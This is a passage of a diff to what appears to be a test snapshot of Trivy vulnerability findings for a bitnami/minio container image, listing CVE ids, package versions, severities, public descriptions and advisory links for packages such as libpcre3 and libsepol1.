"packageName": "login", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "id": "CVE-2017-11164", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "http://openwall.com/lists/oss-security/2017/07/11/3", + "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "http://www.securityfocus.com/bid/99575", + "https://access.redhat.com/security/cve/CVE-2017-11164", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "https://www.cve.org/CVERecord?id=CVE-2017-11164", ], }, "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", - }, - { - "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://avd.aquasec.com/nvd/cve-2017-11164", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "http://openwall.com/lists/oss-security/2017/07/11/3", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "http://www.securityfocus.com/bid/99575", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://access.redhat.com/security/cve/CVE-2017-11164", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", }, ], "severity": "LOW", @@ -66051,66 +66329,76 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "id": "CVE-2017-16231", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "http://seclists.org/fulldisclosure/2018/Dec/33", + "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "http://www.securityfocus.com/bid/101688", + "https://access.redhat.com/security/cve/CVE-2017-16231", + "https://bugs.exim.org/show_bug.cgi?id=2047", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "https://www.cve.org/CVERecord?id=CVE-2017-16231", ], }, "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://avd.aquasec.com/nvd/cve-2017-16231", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "http://seclists.org/fulldisclosure/2018/Dec/33", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "http://www.securityfocus.com/bid/101688", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://access.redhat.com/security/cve/CVE-2017-16231", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://bugs.exim.org/show_bug.cgi?id=2047", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", }, ], "severity": "LOW", @@ -66119,61 +66407,56 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "id": "CVE-2017-7245", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7245", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7245", ], }, "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://avd.aquasec.com/nvd/cve-2017-7245", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://access.redhat.com/security/cve/CVE-2017-7245", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", }, ], "severity": "LOW", @@ -66182,220 +66465,727 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "mount", + "id": "CVE-2017-7246", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7246", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7246", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2017-7246", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://access.redhat.com/security/cve/CVE-2017-7246", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://security.gentoo.org/glsa/201710-25", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "6.2+20201114-2+deb11u1", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-29458", - "installedVersion": "6.2+20201114-2", - "packageName": "ncurses-base", + "id": "CVE-2019-20838", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/41", - "https://access.redhat.com/security/cve/CVE-2022-29458", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - "https://invisible-island.net/ncurses/NEWS.html#t20220416", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", - "https://support.apple.com/kb/HT213488", - "https://ubuntu.com/security/notices/USN-5477-1", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://access.redhat.com/security/cve/CVE-2019-20838", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2019-20838.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "https://www.pcre.org/original/changelog.txt", ], }, "category": "Vulnerability", - "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ncurses: segfaulting OOB read", + "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29458", + "value": "https://avd.aquasec.com/nvd/cve-2019-20838", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29458", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "value": "https://access.redhat.com/security/cve/CVE-2019-20838", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5477-1", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29491", - "installedVersion": "6.2+20201114-2", - "packageName": "ncurses-base", - "references": [ - "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", - "http://www.openwall.com/lists/oss-security/2023/04/19/10", - "http://www.openwall.com/lists/oss-security/2023/04/19/11", - "https://access.redhat.com/security/cve/CVE-2023-29491", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", - "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", - "https://security.netapp.com/advisory/ntap-20230517-0009/", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2023-29491", - "https://www.openwall.com/lists/oss-security/2023/04/12/5", - "https://www.openwall.com/lists/oss-security/2023/04/13/4", - ], - }, - "category": "Vulnerability", - "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Local users can trigger security-relevant memory corruption via malformed data", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29491", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29491", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "value": "https://www.pcre.org/original/changelog.txt", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36084", + "installedVersion": "3.1-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36084", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "https://linux.oracle.com/cve/CVE-2021-36084.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36084", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "libsepol: use-after-free in __cil_verify_classperms()", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "value": "https://avd.aquasec.com/nvd/cve-2021-36084", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", + "value": "https://access.redhat.com/security/cve/CVE-2021-36084", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", + }, + { + "type": "URL", + "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + }, + { + "type": "URL", + "value": 